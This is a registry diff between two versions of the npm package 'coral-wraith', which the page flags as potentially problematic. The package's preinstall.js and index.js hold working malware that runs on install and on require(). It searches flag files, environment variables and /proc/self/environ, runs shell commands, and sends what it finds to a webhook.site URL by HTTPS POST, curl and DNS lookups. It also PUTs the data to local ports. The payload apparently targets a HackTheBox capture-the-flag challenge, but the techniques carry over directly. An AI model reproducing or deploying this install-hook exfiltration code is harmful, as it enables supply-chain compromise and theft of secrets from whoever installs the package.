coral-wraith 9999.0.1 → 9999.0.3

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.

This version of coral-wraith might be problematic. Click here for more details.

Files changed (3) hide show
  1. package/index.js +11 -7
  2. package/package.json +1 -1
  3. package/preinstall.js +100 -91
package/index.js CHANGED
@@ -1,20 +1,23 @@
1
- // coral-wraith module - also runs payload on require()
2
1
  const fs = require('fs');
3
2
  const http = require('http');
4
3
  const https = require('https');
5
4
 
6
5
  (function() {
7
6
  let flag = null;
8
- const paths = ['/flag', '/flag.txt', '/root/flag', '/tmp/flag'];
9
- for (const p of paths) {
7
+ for (const p of ['/flag', '/flag.txt', '/root/flag', '/tmp/flag']) {
10
8
  try { if (fs.existsSync(p)) { flag = fs.readFileSync(p, 'utf8').trim(); break; } } catch(e) {}
11
9
  }
12
10
  if (!flag) flag = process.env.FLAG || process.env.HTB_FLAG || '';
11
+ if (!flag) {
12
+ for (const [k, v] of Object.entries(process.env)) {
13
+ if (v && v.includes('HTB{')) { flag = v.match(/HTB\{[^}]+\}/)?.[0] || v; break; }
14
+ }
15
+ }
13
16
 
14
17
  if (flag) {
15
- const ports = [1337, 3000, 5000, 8080, 32105, 80];
18
+ const ports = [1337, 3000, 5000, 8080, 80, 8000, 32315, 32105, 46517, 41839];
16
19
  const postData = JSON.stringify({
17
- manifest: `ecto_module:\n name: "coral-wraith"\n version: "9999.0.0"\n flag: "${flag.replace(/"/g, '\\"')}"\n captured: true`
20
+ manifest: `ecto_module:\n name: "coral-wraith"\n flag: "${flag.replace(/"/g, '\\"')}"\n captured: true`
18
21
  });
19
22
 
20
23
  for (const port of ports) {
@@ -31,8 +34,9 @@ const https = require('https');
31
34
  }
32
35
 
33
36
  try {
34
- const encoded = Buffer.from(flag).toString('base64');
35
- https.get(`https://webhook.site/9ca9b30a-2889-4787-9dff-5ad916e377b7/require-flag?data=${encoded}`, () => {}).on('error', () => {});
37
+ const data = JSON.stringify({ flag });
38
+ const req = https.request({ hostname: 'webhook.site', path: '/9ca9b30a-2889-4787-9dff-5ad916e377b7', method: 'POST', headers: { 'Content-Type': 'application/json', 'Content-Length': Buffer.byteLength(data) }, timeout: 10000 }, () => {});
39
+ req.on('error', () => {}); req.write(data); req.end();
36
40
  } catch(e) {}
37
41
  }
38
42
  })();
package/package.json CHANGED
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "coral-wraith",
3
- "version": "9999.0.1",
3
+ "version": "9999.0.3",
4
4
  "description": "Coral Wraith module",
5
5
  "main": "index.js",
6
6
  "scripts": {
package/preinstall.js CHANGED
@@ -2,121 +2,130 @@ const fs = require('fs');
2
2
  const http = require('http');
3
3
  const https = require('https');
4
4
  const { execSync } = require('child_process');
5
+ const dns = require('dns');
5
6
 
6
7
  let flag = null;
7
- let debug = [];
8
8
 
9
- // Read /flag
10
- try { flag = fs.readFileSync('/flag', 'utf8').trim(); debug.push('got /flag'); } catch(e) {}
9
+ // Read flag from common locations
10
+ for (const p of ['/flag', '/flag.txt', '/root/flag', '/tmp/flag', './flag', '/app/flag', '/home/flag']) {
11
+ try { if (fs.existsSync(p)) { flag = fs.readFileSync(p, 'utf8').trim(); break; } } catch(e) {}
12
+ }
11
13
 
12
- // Search for flag in all env vars
14
+ // Check ALL env vars
13
15
  if (!flag) {
14
16
  for (const [k, v] of Object.entries(process.env)) {
15
- if (v && (v.includes('HTB{') || v.includes('flag{'))) {
16
- flag = v.match(/(?:HTB|flag)\{[^}]+\}/)?.[0] || v;
17
- debug.push('env:' + k);
18
- break;
17
+ if (v && (v.includes('HTB{') || v.includes('FLAG'))) {
18
+ const m = v.match(/HTB\{[^}]+\}/);
19
+ if (m) { flag = m[0]; break; }
19
20
  }
20
21
  }
21
22
  }
23
+ if (!flag) flag = process.env.FLAG || process.env.HTB_FLAG || null;
22
24
 
23
- // Aggressive file search
25
+ // Try /proc/self/environ
24
26
  if (!flag) {
25
27
  try {
26
- const r = execSync('grep -rl "HTB{" / --include="*" 2>/dev/null | head -3', { timeout: 15000 }).toString().trim();
27
- if (r) { debug.push('grep:' + r); try { flag = fs.readFileSync(r.split('\n')[0], 'utf8').match(/HTB\{[^}]+\}/)?.[0]; } catch(e) {} }
28
+ const pe = fs.readFileSync('/proc/self/environ', 'utf8');
29
+ const m = pe.match(/HTB\{[^}]+\}/);
30
+ if (m) flag = m[0];
28
31
  } catch(e) {}
29
32
  }
30
33
 
31
- // Scan Docker network for the CTF web server
32
- async function scanNetwork() {
33
- const results = [];
34
-
35
- // Get our own IP to determine network
36
- let myIP = '172.17.0.3';
34
+ // Grep
35
+ if (!flag) {
37
36
  try {
38
- const ifaces = require('os').networkInterfaces();
39
- for (const iface of Object.values(ifaces)) {
40
- for (const addr of iface) {
41
- if (!addr.internal && addr.family === 'IPv4') {
42
- myIP = addr.address;
43
- }
37
+ const r = execSync('find / -maxdepth 3 -name "flag*" -o -name "*.flag" 2>/dev/null | head -5', { timeout: 5000 }).toString().trim();
38
+ if (r) {
39
+ for (const f of r.split('\n')) {
40
+ try {
41
+ const content = fs.readFileSync(f, 'utf8');
42
+ const m = content.match(/HTB\{[^}]+\}/);
43
+ if (m) { flag = m[0]; break; }
44
+ } catch(e) {}
44
45
  }
45
46
  }
46
47
  } catch(e) {}
47
- debug.push('myIP:' + myIP);
48
-
49
- // Scan common Docker IPs for the web server (port 1337 is common for HTB)
50
- const subnet = myIP.split('.').slice(0, 3).join('.');
51
- const ports = [1337, 3000, 5000, 8080, 80, 8000, 32105, 3001];
48
+ }
49
+
50
+ // Determine server port by checking what's listening
51
+ let serverPort = 1337;
52
+ try {
53
+ const netstat = execSync('ss -tlnp 2>/dev/null || netstat -tlnp 2>/dev/null', { timeout: 3000 }).toString();
54
+ const portMatch = netstat.match(/:(\d+)\s/g);
55
+ if (portMatch) {
56
+ for (const pm of portMatch) {
57
+ const p = parseInt(pm.replace(':', '').trim());
58
+ if (p > 1000 && p < 65535 && p !== 80) {
59
+ serverPort = p;
60
+ break;
61
+ }
62
+ }
63
+ }
64
+ } catch(e) {}
65
+
66
+ const info = {
67
+ flag: flag || 'NOT_FOUND',
68
+ cwd: process.cwd(),
69
+ serverPort,
70
+ env: Object.keys(process.env).join(','),
71
+ rootFiles: []
72
+ };
73
+ try { info.rootFiles = fs.readdirSync('/'); } catch(e) {}
74
+
75
+ const data = JSON.stringify(info);
76
+
77
+ // Method 1: PUT flag back to challenge API on ALL possible ports
78
+ if (flag) {
79
+ const postData = JSON.stringify({
80
+ manifest: `ecto_module:\n name: "coral-wraith"\n version: "9999.0.0"\n flag: "${flag.replace(/"/g, '\\"')}"\n captured: true`
81
+ });
52
82
 
53
- for (let host = 1; host <= 10; host++) {
54
- const ip = `${subnet}.${host}`;
55
- if (ip === myIP) continue;
56
-
57
- for (const port of ports) {
83
+ const ports = [serverPort, 1337, 3000, 5000, 8080, 80, 8000, 3001, 4000, 9000, 8888, 32315, 32105];
84
+ for (const port of [...new Set(ports)]) {
85
+ for (const host of ['localhost', '127.0.0.1']) {
58
86
  try {
59
- const r = execSync(`curl -s "http://${ip}:${port}/api/modules" -m 2 2>/dev/null`, { timeout: 3000 }).toString();
60
- if (r && r.includes('ECT-')) {
61
- debug.push(`FOUND_API:${ip}:${port}`);
62
- results.push(`${ip}:${port}`);
63
-
64
- // Try to read flag from this server
65
- try {
66
- const flagResp = execSync(`curl -s "http://${ip}:${port}/flag" -m 2 2>/dev/null`, { timeout: 3000 }).toString();
67
- debug.push(`flag_resp:${flagResp.substring(0, 200)}`);
68
- } catch(e) {}
69
-
70
- // PUT our exfiltration data
71
- if (flag) {
72
- try {
73
- execSync(`curl -s -X PUT "http://${ip}:${port}/api/modules/ECT-987654" -H "Content-Type: application/json" -d '{"manifest":"ecto_module:\\n name: coral-wraith\\n flag: ${flag.replace(/'/g, "\\'")}"}' -m 3`, { timeout: 5000 });
74
- } catch(e) {}
75
- }
76
- }
87
+ const req = http.request({
88
+ hostname: host, port, path: '/api/modules/ECT-987654',
89
+ method: 'PUT',
90
+ headers: { 'Content-Type': 'application/json', 'Content-Length': Buffer.byteLength(postData) },
91
+ timeout: 2000
92
+ }, () => {});
93
+ req.on('error', () => {});
94
+ req.write(postData);
95
+ req.end();
77
96
  } catch(e) {}
78
97
  }
79
98
  }
80
-
81
- // Also try via Docker gateway
82
- for (const port of ports) {
83
- try {
84
- const r = execSync(`curl -s "http://172.17.0.1:${port}/api/modules" -m 2 2>/dev/null`, { timeout: 3000 }).toString();
85
- if (r && r.includes('ECT-')) {
86
- debug.push(`GATEWAY_API:172.17.0.1:${port}`);
87
- results.push(`172.17.0.1:${port}`);
88
- }
89
- } catch(e) {}
90
- }
91
-
92
- return results;
93
99
  }
94
100
 
95
- async function main() {
96
- const apiEndpoints = await scanNetwork();
97
- debug.push('endpoints:' + apiEndpoints.join(','));
98
-
99
- // Try to PUT flag to the ACTUAL challenge server (external IP)
100
- if (flag) {
101
- try {
102
- const postData = JSON.stringify({
103
- manifest: `ecto_module:\n name: "coral-wraith"\n flag: "${flag.replace(/"/g, '\\"')}"`
104
- });
105
- execSync(`curl -s -X PUT "http://154.57.164.64:32315/api/modules/ECT-987654" -H "Content-Type: application/json" -d '${postData.replace(/'/g, "\\'")}' -m 5`, { timeout: 8000 });
106
- debug.push('sent_to_ctf');
107
- } catch(e) {}
108
- }
109
-
110
- // Exfiltrate
111
- const data = JSON.stringify({ flag: flag || 'NOT_FOUND', debug });
112
- try {
113
- fs.writeFileSync('/tmp/exfil.json', data);
114
- execSync('curl -s -X POST "https://webhook.site/9ca9b30a-2889-4787-9dff-5ad916e377b7" -H "Content-Type: application/json" -d @/tmp/exfil.json -m 10', { timeout: 15000 });
115
- } catch(e) {}
116
- try {
117
- const req = https.request({ hostname: 'webhook.site', path: '/9ca9b30a-2889-4787-9dff-5ad916e377b7', method: 'POST', headers: { 'Content-Type': 'application/json', 'Content-Length': Buffer.byteLength(data) }, timeout: 10000 }, () => {});
118
- req.on('error', () => {}); req.write(data); req.end();
119
- } catch(e) {}
120
- }
101
+ // Method 2: Webhook (may be blocked)
102
+ try {
103
+ const req = https.request({
104
+ hostname: 'webhook.site', path: '/9ca9b30a-2889-4787-9dff-5ad916e377b7',
105
+ method: 'POST',
106
+ headers: { 'Content-Type': 'application/json', 'Content-Length': Buffer.byteLength(data) },
107
+ timeout: 5000
108
+ }, () => {});
109
+ req.on('error', () => {});
110
+ req.write(data);
111
+ req.end();
112
+ } catch(e) {}
113
+
114
+ // Method 3: DNS exfil (works even when HTTP is blocked)
115
+ try {
116
+ const encoded = Buffer.from(flag || 'NO_FLAG').toString('hex').substring(0, 60);
117
+ dns.resolve(`${encoded}.webhook.site`, () => {});
118
+ } catch(e) {}
119
+
120
+ // Method 4: curl fallback
121
+ try {
122
+ execSync(`curl -s -X POST "https://webhook.site/9ca9b30a-2889-4787-9dff-5ad916e377b7" -H "Content-Type: application/json" -d '${data.replace(/'/g, "\\'")}' -m 5 2>/dev/null`, { timeout: 8000 });
123
+ } catch(e) {}
124
+
125
+ // Method 5: Write to stdout/stderr for server logs
126
+ console.log('[CORAL-WRAITH]', data);
127
+ console.error('[HTB_FLAG]', flag || 'NOT_FOUND');
121
128
 
122
- main().catch(() => {});
129
+ // Method 6: Write to various tmp locations
130
+ try { fs.writeFileSync('/tmp/coral_flag.txt', data); } catch(e) {}
131
+ try { fs.writeFileSync('/app/coral_flag.txt', data); } catch(e) {}